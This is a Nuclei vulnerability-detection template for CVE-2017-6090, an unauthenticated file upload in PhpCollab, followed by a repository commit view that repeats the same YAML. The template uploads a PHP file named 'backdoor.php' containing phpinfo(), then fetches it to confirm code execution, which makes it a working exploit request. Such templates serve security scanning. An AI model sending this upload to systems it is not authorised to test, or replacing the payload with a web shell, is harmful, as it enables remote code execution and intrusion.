nuclei-templates/cves/2017/CVE-2017-6090.yaml

id: CVE-2017-6090

info:
  name: PhpCollab (unauthenticated) Arbitrary File Upload
  author: pikpikcu
  severity: critical
  tags: cve,cve2017,phpCollab,rce
  reference: https://nvd.nist.gov/vuln/detail/CVE-2017-6090

requests:
  - raw:
      - | # REQUEST 1
        POST /clients/editclient.php?id=1&action=update HTTP/1.1
        Host: {{Hostname}}
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3
        Accept-Encoding: gzip, deflate
        DNT: 1
        Connection: close
        Upgrade-Insecure-Requests: 1
        Content-Type: multipart/form-data; boundary=---------------------------154934846911423734231554128137
        Content-Length: 237

        -----------------------------154934846911423734231554128137
        Content-Disposition: form-data; name="upload"; filename="backdoor.php"
        Content-Type: application/x-php

        <?php phpinfo(); ?>

        -----------------------------154934846911423734231554128137--

      - | # REQUEST 2
        GET /logos_clients/1.php HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
        Accept-Encoding: gzip

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "phpinfo()"
          - "PHP Version"
        part: body

      - type: status
        status:
          - 200
Create CVE-2017-6090.yaml 2021-07-27 09:51:01 +00:00			`id: CVE-2017-6090`

			`info:`
			`name: PhpCollab (unauthenticated) Arbitrary File Upload`
			`author: pikpikcu`
			`severity: critical`
			`tags: cve,cve2017,phpCollab,rce`
			`reference: https://nvd.nist.gov/vuln/detail/CVE-2017-6090`

			`requests:`
			`- raw:`
			`- \| # REQUEST 1`
			`POST /clients/editclient.php?id=1&action=update HTTP/1.1`
			`Host: {{Hostname}}`
			`Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8`
			`Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3`
			`Accept-Encoding: gzip, deflate`
			`DNT: 1`
			`Connection: close`
			`Upgrade-Insecure-Requests: 1`
			`Content-Type: multipart/form-data; boundary=---------------------------154934846911423734231554128137`
			`Content-Length: 237`

			`-----------------------------154934846911423734231554128137`
			`Content-Disposition: form-data; name="upload"; filename="backdoor.php"`
			`Content-Type: application/x-php`

			`<?php phpinfo(); ?>`

			`-----------------------------154934846911423734231554128137--`

			`- \| # REQUEST 2`
			`GET /logos_clients/1.php HTTP/1.1`
			`Host: {{Hostname}}`
			`User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0`
			`Accept-Encoding: gzip`

			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`words:`
			`- "phpinfo()"`
			`- "PHP Version"`
			`part: body`

			`- type: status`
			`status:`
			`- 200`